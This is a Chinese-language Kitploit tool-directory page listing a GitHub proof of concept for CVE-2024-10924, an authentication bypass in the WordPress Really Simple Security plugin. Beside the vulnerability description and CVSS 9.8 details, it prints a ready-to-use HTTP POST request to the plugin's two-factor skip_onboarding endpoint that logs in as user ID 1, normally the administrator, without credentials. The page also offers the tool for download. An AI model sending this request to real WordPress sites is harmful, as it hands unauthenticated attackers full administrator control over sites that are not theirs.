Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-10924 — Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – 身份验证绕过 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-10924
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubrandomrobbiebf/cve-2024-10924

CVE-2024-10924

Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – 身份验证绕过

查看仓库
4131年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-10924

Really Simple Security(免费版、专业版和专业多站点版)9.0.0 – 9.1.1.1 – 身份验证绕过

描述

WordPress的Really Simple Security(免费版、专业版和专业多站点版)插件在9.0.0至9.1.1.1版本中存在身份验证绕过漏洞。这是因为双因素REST API操作中的'check_login_and_get_user'函数对用户检查错误处理不当。当“双因素认证”设置启用时(默认禁用),未经身份验证的攻击者可以利用此漏洞以站点上任何现有用户(如管理员)的身份登录。

root@kitploit:~
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE	CVE-2024-10924
CVSS	9.8 (Critical)
公开发布日期	2024年11月14日
最后更新日期	2024年11月14日
研究人员	István Márton - Wordfence

POC

root@kitploit:~
POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;
Connection: keep-alive
Content-Length: 90

{
    "user_id":1,
    "login_nonce": "231231231",
    "redirect_to": "/wp-admin/"
}
下载工具